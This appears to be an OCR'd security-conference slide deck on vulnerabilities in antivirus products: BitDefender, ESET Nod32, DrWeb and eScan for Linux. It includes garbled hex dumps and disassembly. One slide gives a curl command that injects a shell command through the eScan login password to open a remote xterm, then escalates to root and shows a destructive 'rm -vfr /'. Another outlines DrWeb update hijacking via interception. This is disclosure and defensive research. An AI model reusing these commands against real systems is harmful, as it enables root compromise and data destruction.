

00 


00006E80 
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DB 


47 


00 
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CB 
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??G.??W.?7W.??G, 






00006E80 


CB 


DB 


47 


00 


CB 


DB 57 
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CB 


CB 
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47 
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DB 47 
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00006E90 


CB 


DB 


47 


00 


CB 


DB 47 


00 


DB 


DB 


47 


00 


DB 


DB 


47 


00 


00006EA0 


DB 


OB 


47 


00 


AB 


OC 47 


00 


IF 


OC 


47 


00 


IF 


&C 


46 


00 


??G,?,G, , ,G, ,?F, 






00006EA0 


DB 


DB 


47 


00 


AB 


OC 47 


00 


IF 


OC 47 


00 


IF 


9C 


46 


00 



,0, 



. . ? . . 

■? 7 



SHR3, 

, 

2,gQ-.cQ?UIm?UIin 

?UIiiizUFl 

,!,,,!,,??,, 
?{, .?{D,?kD, 
?-(D.?{0.?{D. 
??G.??G.??G. 
?7W.??W.??G. 
?7G.??G.??G. 
?,G, , ,G. ,?F. 



. ? . 
?? . 
?{D 
?{0 
??G 
??G 
??6 



Those bytes were used to calculate the file and 
sections alignment of the new, in memory, unpacked 
PE file. 

When set to OxFFFFFFFF and OxFFFFFFF, both file 
and sections alignment were set to 0... 



BitDefender bugs 



■ ...and their values were used, later on, in some 
arithmetic operations: 

Uro :F6fl74SBE mov eax, [ecx+I(4AiGE_llT_HEABERiS .OptionalHeader .FileAlignmjent] ; calculated FlleAligmnient of the new PE file (will be 0) 

Uro:F6874SCl add esi, 28h 

Uro:F6874 9C4 push ebx 

Uro:F6874 3C5 mov ebx, [ee3t+IMRGE_HT_HEAEERS . Opt ionalHeader . Sect ionAllgmnent ] ; calculated SectionAlignment of the new PE file (will be 0) 

!ero [F6874SC8 mov [ebp+file_aligrLiiient] , eax 

Ecro [F6S74 9CB cmp eax, 20 Oh 

:ero :F6a74SD0 jbe short loc_F6874 9DA 

5ero:F6fl74 9D2 mov eax, 200h 

!ero :F68743D7 mov [ebp+file_aligiuiifint] , eax 

lero :F68749DA ~ 

sero[F6B74SDft loc_FeS74 9DA: ; CODE XREF: 3Ub_F63743DO+100 T j 

lero [F6874SDft ~ lea edx, [ebx-lT ~ 

Ecro :F6B74 9DD test ebx, edx 

sero :F6874 9DF jz short loc_F6874 9E3 

Eero :F6874 9E1 mov ebx, eax 

Eero :F68749E3 

Eero[F6874 3E3 loc_FeS74 9E3 : ; CODE XREF: aub_F68743D0+10FT ] 

Eero :F6B74 3E3 ~ xor edx, edx 

Eero :F6874SE5 mov eax, esi 

Eero:Fe874 9E7 div ebx ; Divide by zero with SectionAligninent 

Eero :F6874 9E3 test edx, edx 

Eero [F6874SEB jz short loc_F6B74 9Fl 

Eero [F6B74SED sub ebx, edx 

Eero :F6874 3EF add esi, ebx 

Eero:F6B749Fl 

Eero:F6874 9Fl loc_F6B74 9F1 : ; CODE XREF: sub_F68748D0+llBT j 

Eero :F6874 9F1 mov ebx, [ebp+f lle_aligninent ] 

Eero [F6B74SF4 xor edx, edx ~ 

Eero [F6874SF6 mov eax, esi 

Eero :F68743F8 div ebx ; Divide by zero, with FileAlignment | 



Those 2 bugs were trivial to discover. But they 
failed to find them by themselves... 



One more complex BitDefender bug... 



(Vulnerability fixed) Modifying a single byte in a 
Thinstall installer would make it to crash: 



t > \3 ' 



21/08/13 02:20:24 215.156 bytes 



00006530 
00006540 
00006550 
00006560 
00006570 
00006580 
00006590 



5B 75 E2 
B1 29 C6 
6F 02 33 
97 84 FD 
1C F7 4C 
52 76 C3 
FE 61 4A 



7C 6E C4 
F6 85 DO 
^99 94 
EF FB 44 
DA CI 68 
36 D6 6B 
DC 2A 77 



BF 5B IF 

02 CC 34 

Dl F7 56 

62 BF 28 

99 45 4D 

B4 98 42 

23 60 BF 



EO 5B 70 A2 
FO 80 F1 17 
E3 2E BA 19 
BF B8 C8 76 
B4 7E 4B 66 
CD OE 9B E6 
E7 97 BF EF 



9C 59 E6 
45 EE D3 
CD 6F 9A 
FF D9 C8 
B6 FA 95 
9F A6 26 
AC 4F 20 



[u7|n7?[.7[p??Y? 
7)7777 .74777 .E77 
0.377777V?, 7. ?o? 
?????Db?(???V??? 
,?L??h?EM?-Kf??? 
Rv?6?k7?B?,????a 
?aJ.*W#'?77??70 



16/09/13 10:02:51 215.156 bytes Rea d-only 



00006530 5B 

00006540 B1 

00006550 6F 

00006560 97 

00006570 1C 

00006580 52 

00006590 FE 



75 E2 

29 ce 

02 33 
84 FD 
F7 4C 

76 C3 
61 4A 



7C 6E C4 BF 5B 
F6 85 DO 02 CC 
9D 99 94 Dl F7 
EF FB 44 62 BF 
DA CI 68 99 45 
36 D6 6B B4 98 
OC 2A 77 23 60 



IF EO 5B 70 A2 
34 FO 80 F1 17 
56 E3 2E BA 19 
28 BF B8 C8 76 
4D B4 7E 4B 66 
42 CD OE 9B E6 
BF E7 97 BF EF 



9C 59 E6 
45 EE D3 
CD 6F 9A 
FF D9 C8 
B6 FA 95 
9F A6 26 
AC 4F 20 



[u7|ri7?[.7[p?7Y7 
7)7777 .74777 .E7? 
o.3?'77??V?.?.?o? 
?????Db?(???v??? 
,?L??h?EM?-Kf??? 
Rv?6?k??B7.777?& 
?aJ.*W#'7777?70 



- After modifying one byte, the decompressed content 
would get corrupt. And index to a table was calculated 
witli the corrupted content... and data likely controlled 
by the attacker was copied to a position also likely 
controllable. 

- Again: this bug was trivial to discover. TRIVIAL. 



BitDefender notes 



■ This and all BitDefender's bugs don't affect 
exclusively BitDefender's products. 

■ It affects many AV products out there as 
previously mentioned. 

■ Adding a new AV engine to your product may 
sound "cool" but you're making 3rd party bugs 
yours. 

■ And, by the way, you didn't audit it before 
adding to your product... 

- Otherwise, I doubt you would have added it. 



(es 


erj 


NOD 32 

antivirus system 



ESET Nod32 



. ESET Nod32 is a well known Slovak AV 
engine. 

■ Like many other AV engines, it suffers from a 
number of vulnerabilities that can be trivially 
discovered. 

■ One little example: a malformed PDF file. 

- A negative or big value for any element of a /W(idth) 
element with arrays used to crash it. 

- A simple remote denial of service. 



ESET Nod32 bug with PDF files 



(l/reviBed_effective_date5-2010.pdf 



|/revised_effective_date5-2010.pdf-5ampleTj ^ 1^ ^ 



23/03/14 17:45:20 222.075 bytes 



23/03/14 16:32:13 222.113 bytes 
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According to ESET sources they use fuzzing as 
part of QA. 

- I think they are not doing it very well... 

Finding this bug was trivial, like all the ones I 
previously shown. 

This bug was reported and fixed by ESET. 



Remote Code Execution 



DrWeb antivirus 



■ DrWeb is a russian antivirus. Used, for example, by the largest bank 
(Sberbank) and the largest search engine in Russia (Yandex) + the 
Duma, to name a few customers. 

■ More of their propaganda (the original web page I got this information 
from is inaccessible since I disclosed just 1 vulnerability during 
SyScan 2014 Singapore): 

l^jSy Licenses and Certificates 

Dr.Web Is the onlv antl-vlrus certified by the Ministry of Defence of the Russian Federation, 
the highest grade of certificate from the Government. 



■ License of the Ministry of Defence of tlie Russian Federation, for activities related to information 
security tools development 



Dr.Web are certified by FSB (Federal Security Service] and FSTEC (Federal Service for 
Technology and Export Control], which allow their use In organizations with high standards 
of security. 

■ License of the FSB Russia, for activies involving access to state secret information within Moscow 
and Moscow region 

■ License of the Centre for licensing, certification and state secret information protection of FSB 
Russia, for development and/or publishing of tools for protection of classified information 

■ License of the FSTEC for development of information security tools 

■ License of the FSTEC for development and/or publishing of tools for protection of classified 
information 



DrWeb updating protocol 



. DrWeb used (still does it?) to update via HTTP 
only. They do not use SSL/TLS. 

■ It used to download a catalog file first: 

- Example for Linux: 

■ http://<server>/unix/700/drweb32.lst.lzma 

- In the catalog file there was a number of updatable 
files + a hash for them: 

. VDB files (Virus DataBases). 
. DrWeb32.dll. 

- The hash was, simply, a CRC32 and no component 
was signed, even the DrWeb32.dll library. 



DrWeb updating protocol 



. The "highest grade of certificate from the government" used to 
require the highest grade of checking for their virus database 
files and antivirus libraries: CRC32. Lol. 

- To exploit in a LAN intercepting these domains was enough: 

- update. nsk1 .drweb.com 

- update.drweb.com 

- update.msk.drweb.com 

- update.us.drweb.com 

- update.msk5.drweb.com 

- update.msk6.drweb.com 

- update.frl .drweb.com 

- update.us1.drweb.com 

- update. nsk1 .drweb.com 

- ...and replacing drweb32.dll with your "modified" (Izma'ed) version. 



DrWeb updating protocol 



- Exploiting it was ratlier easy witli ettercap and a quick 
Pytlion web server + Unix Izma tool. 

■ You only need to calculate the CRC32 checksum and 
compress (Izma) the drweb32.dll file. 

- I tested the bug under Linux: full code execution is 
possible. 

■ Though you need to be in a LAN to be able to do so, 
obviously. 

- One Russian guy wrote a Metasploit exploit for 
Windows: 



- In my opinion, this updating protocol (is?) was horrible. 



DrWeb updating protocol vulnerability 



The vulnerability was fixed and "an alert" issued. 

In the "alert" they do not say they fixed a vulnerability. 

■ 

- The alert is not available in English, only Russian 
and, I think, Chinese. 

They only said that changes were made to increase 
the security of the update procedure. 

■ Technically true: From no security to some security. 

I did not research the update. It can be fun as I'm 99% 
sure they are doing it wrong. 

■ I had no time to check for this conference, sorry :( 



eScan for Linux 



■ I was bored some random night in Singapore and found 
that the eScan product have a Linux version. 

■ I downloaded and installed it ('^1 hour because of the awful 
hotel's connection). 

■ Then I started checking what it installs, finding for SUID 
binaries, etc... 

- They use BitDefender and ClamAV engines, they don't have 
their own engine so, no need to test the scanners. 

- I already had vulnerabilities for such engines... 

■ They install a Web server for management and a SUID 
binary called: 

■ /opt/MicroWorld/sbin/runasroot 



eScan for Linux 



■ The SUID binary allows to execute root 
commands to the following users: 

- root 

- mwconf (created during installation). 

■ The eScan management application (called 
MwAdmin) is so flawed I decided to stop at the 
first RCE... It was fixed recently. 

- A command injection in the login form (PHP). 
■ In a "security" product. 

- Yes. 



eScan for Linux login page 




Username (Email-id): 
Password: 
Product name: 
language: 



Select pnoduct 



English 



Forgot Password 
Login Restablecer 



eScan for Linux remote root 



■ This specific bug required to know/guess an existing user. 
Not so hard. 

- People from Immunity discovered more bugs that didn't 
require to guess a user name and used this application as a 
vuln-hunting teaching tool. 

- The application is buggy as hell. It's only good for learning 
what not to do or how to write easy exploits, as a tutorial. 

■ The user name and the password were used to construct 
an operating system command executed via the PHP's 
function "exec". 

. I was not able to inject in the user name. 
. But I was able to inject in the password. 



Source code of login. php (I) 



if (isvalid_ejnailid_singlGl (Susername) != 0 ) 

headerC "Location : index . php?err_msg=user" ) : 

exitC); 

> 

elseifC strlenf tpasswd) < 5) 
I 

heade r (" Location : index . php?e r r_jnsg-passwo rd_len ") ; 

exitC); 

> 

else 

*retval = check_user(SusernaTne , " NULL " , *pa3swdFile , "NULL"); 

listCtk , lv)=explodeC ■■ - " , Sretval) ; 

ifC$u «= 0 O 
-C 

heade r C "Location : index . php?err_insg=usernotexists" ) ; 

exitC); 

} 

elseif( st rlenC*pa33wd)<5 ) 

-t 

heade r C "Location : index . php?err_msg=password_len" ) ; 

exitCK 

> 

elseifC preg_matchC'V [ |&K ! ><\ " V" ' ipasswc^) ) 

-£ 

heade r C " Location : • index . php ?e r r_msg=passwo rd_cha rs ") ; 

exitC); 

\ I 



Source code of login. php (II) 



- The password sent to the user was passed to 
check user: 



} 

GlseifC preg_matchC '/[ |&)C !><\"\" ]/" , Spasswd) ) 

i 

headerC "Location : index . php?err_jnsg=password_cha 

exitC) ; 

} 

else 

-c 




lretval= 


check_usenCSu3ername , Spasswd , IpasswdFile , "USERS" 




listCtk , $v)=explodeC " - " , Sretval) ; 

if Ctv 0> 





- There were some very basic checks against the 
password. 

- Specially for shell escape characters. 

- But they forgot various other characters like 



Source code of common_functions.php 



■ Then, the given password was used in the 
function check user like this: 



function check_userCSuname, Spassword, Spassfile^ tproduct) 
{ 

// name and path of the - binary 

Jprog = Vopt/MicroWorld/sbin/checkpass" ; 

Irunasroot = 'Vopt/WicroWorld/sbin/runasroot"; 

unset(Soutput) ; 

unsetClret) ; 

// • name • and • path ■ of ■ the ■ passwd • file 




Sout= exeqC'Srunasroot Sprog Suname Ipassword Spassfile Iproduct" .Soutput , tret); 


tval = toutput[0]/'-".$ret; 

return Sval; 

} 





eScan for Linux RCE 



- My super-ultra-very-txupi-complex exploit for it: 

$ xhost + 

$ export TARGET=http: //target: 10080 
$ curl --data 

"product=l&uname=valid@user . com&pass=1234567 ; 
D I S PLAY=YOURI P : 0 ; x term ; " $ TARGE T/login.php 

- Once you're in, run this to escalate privileges: 

$ /opt/MicroWorld/ sbin/ runasroot /usr/bin/ 
xterm 

. Or anything else you want... 

$ /opt/MicroWorld/sbin/runasroot rm -vfr /^ 
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Conclusions 



. In general, AV software... 

■ ...doesn't make you any safer against skilled attackers 

■ ...increase your attack surface. 

■ ...make you more vulnerable to skilled attackers. 

■ ...are as vulnerable to attacks as any other application 

- Some AV software... 

■ ...may lower your operating system protections. 

■ ...are plagued of both local and remote vulnerabilities. 

- Some AV companies... 

■ ...don't give a fuck about security in their products. 



Breaking antivirus software 



Introduction 

Attacking antivirus engines 
Finding vulnerabilities 
Exploiting antivirus engines 
Antivirus vulnerabilities 
Conclusions 
Recommendations 



Recommendations for AV users 



Do not blindly trust your AV product. 

- BTW, do not trust your AV product. 

- Also, do not trust your AV product. 

- Nope. I cannot stress it enough. 

Isolate the machines with AV engines used for 
gateways, network inspection, etc... 

Audit your AV engine or ask a 3rd party to audit 
the AV engine you want to deploy in your 
organization. 



Recommendations for AV companies 



■ Audit your products: source code reviews & fuzzing. 

. No, AV comparatives and the like are not even remotely 
close to this. 

. Running a Bug Bounty, like Avast, is a very good idea too. 

■ Do not use the highest privileges possible for scanning 
network packets, files, etc... 

- You don't need to be root/system to scan a network packet 
or a file. 

. You only need root/system to get the contents of that packet 
or file. 

- Send the network packet or file contents to another, low 
privileged or sandboxed, process. 



Recommendations for AV companies 



. Run dangerous code under an emulator, vm or, at the very 
least, in a sandbox. I only know 1 AV using this approach. 

- The file parsers written in C/C++ code are very dangerous. 

- If one finds a vulnerability and it's running inside an emulator/ 
sandbox one needs also an escape vulnerability to completely 
own the AV engine. 

- Why is it harder to exploit browsers than security 
products? 

- Or use a "safer" language. Some AV products, actually, are doing 
this: Using Lua, for example. 

- Do not trust your own processes. They can be owned. 

- I'm not talking about signing the files. 

■ I'm talking about your AV's running processes. 



Recommendations for AV companies 



■ Do not use plain HTTP for updating your 
product. 

- Use SSL/TLS. 

- Also, digitally sign all files. 

■ No, CRC is not a signature. Really. 

- ...and verify there is nothing else after the signature. 

- Also, verify the whole certification chain... 



Recommendations for AV companies 



- Drop old code that is of no use today or make this 
code not available by default. 

■ Code for MS-DOS era viruses, packers, protectors, 
etc... 

■ Parsers for file format vulnerabilities in completely 
unsupported products nowadays. 

- Such old code not touched in years is likely to have 
vulnerabilities. 

- Ignore any antivirus comparative company asking you 
to detect malwares from the Jurassic era. Avoid them. 



